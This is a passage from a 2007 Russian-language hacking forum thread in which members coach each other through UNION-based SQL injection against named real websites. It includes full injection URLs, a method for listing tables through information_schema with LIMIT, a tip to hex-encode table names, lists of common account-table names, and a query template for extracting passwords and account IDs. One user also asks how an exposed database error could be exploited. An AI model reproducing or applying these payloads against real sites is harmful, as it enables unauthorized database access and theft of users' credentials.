ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #161  
Старый 18.09.2007, 14:05
Аватар для Heavy Metal
Heavy Metal
Новичок
Регистрация: 16.09.2007
Сообщений: 25
Провел на форуме:
120760

Репутация: 62
Отправить сообщение для Heavy Metal с помощью ICQ
По умолчанию

of69, нужно в запросе указать бд:

Код:
http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,4,5+from+gallery2.g2_User/*
 
Ответить с цитированием

  #162  
Старый 18.09.2007, 19:17
Аватар для delay(0)
delay(0)
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343

Репутация: 141
По умолчанию

2 of69
Код:
Ктонибудь, подскажите плиз в чём проблема, и как её решить?)
Смотришь database(), если запрос возвращает к примеру db1, то меняешь запрос на ...+from+db1.g2_User...
Если не прокатывает, то смотришь в какой базе эта таблица лежит.
...select+table_schema+from+information_schema.col umns+where+table_name=g2_User...
Не забудь закодировать имя таблицы char`ои или hex'ом. Ну и соответственно полученной базе составляешь запрос.

2 Calcutta
Цитата:
может кто помочь с подбором?
Никакого посимвольного подбора. Юзай limit. ^^
Код:
http://la2.acrossworld.ru/index.php?act=18&rlvl=7&r_rec_id=-1+union+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+limit+0,1/*
Поочередно меняешь limit+0,1/*, limit+1,1/*, 2,1 и т.д. Все таблички как на ладошке.

Последний раз редактировалось delay(0); 18.09.2007 в 19:33..
 
Ответить с цитированием

  #163  
Старый 19.09.2007, 10:27
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Лол, под пароли не создается спец. таблица

Ищи на форуме списки распространенных названий пользовательских таблиц.

account
accounts
game_accounts
sup_auth
la2_auth

и т.д.
 
Ответить с цитированием

  #164  
Старый 19.09.2007, 11:01
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

распространенные пробовал уже, практически все те что есть на форуме.
значит у меня должен будет быть запрос примерно такой:
http://la2.acrossworld.ru/index.php?act=18&rlvl=7&r_rec_id=-1+union+select+1,2,concat_ws(0x3a,[название таблиц с паролями],[id аккаунта]),4,5,6,7,8+from+[таблица с аккаунтами (к примеру, accounts)]/*
 
Ответить с цитированием

  #165  
Старый 19.09.2007, 11:16
Аватар для 1d37r
1d37r
Banned
Регистрация: 24.08.2007
Сообщений: 50
Провел на форуме:
303789

Репутация: 16
По умолчанию

Цитата:
DB function failed with error number 1146
Table 'db0742011.jos_session' doesn't exist SQL=SELECT session_id FROM jos_session WHERE session_id = '038f08755e3d58568bf9b979e1d09571'
SQL =

SELECT session_id
FROM jos_session
WHERE session_id = '038f08755e3d58568bf9b979e1d09571'
Подскажите что это?
 
Ответить с цитированием

  #166  
Старый 19.09.2007, 11:20
Аватар для groundhog
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

Ну если дословно... Это неуспешное выполнение какой-то функции. Причина - попытка выборки из несуществующей таблицы "jos_session" в базе "db0742011".
 
Ответить с цитированием

  #167  
Старый 19.09.2007, 11:24
Аватар для 1d37r
1d37r
Banned
Регистрация: 24.08.2007
Сообщений: 50
Провел на форуме:
303789

Репутация: 16
По умолчанию

а как это можно исправить и как хакер может этим воспользоваться?
 
Ответить с цитированием

  #168  
Старый 19.09.2007, 11:29
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

ссылку, пожалуйста, выложи =) а там мож чем и сможем помочь.
//обложился распечатками статей.. всё-таки тяжело одному сидеть разбираться -))
//может кто подсказать по моей инъекции, а то мозг разрывает уже -)) второй день пытаюсь расковырять где там пароли лежат. а если кто доработает, то на плюсики не поскуплюсь
 
Ответить с цитированием

  #169  
Старый 19.09.2007, 11:46
Аватар для 1d37r
1d37r
Banned
Регистрация: 24.08.2007
Сообщений: 50
Провел на форуме:
303789

Репутация: 16
По умолчанию

http://www.battle.rapx.net.ru/index.php
 
Ответить с цитированием

  #170  
Старый 19.09.2007, 11:50
Аватар для groundhog
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

1d37r, ну то, что не работает хакер вряд ли использует... Кода я не видел, поэтому не знаю как передаётся этот хеш скриптам, и что фильтруется... Если параметр, в котором передаётся хеш уязвим к SQL-Injection, то можно провести атаку. Настчёт исправления опять же... Ты смотрел - эта таблица, из которой идёт выборка есть?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ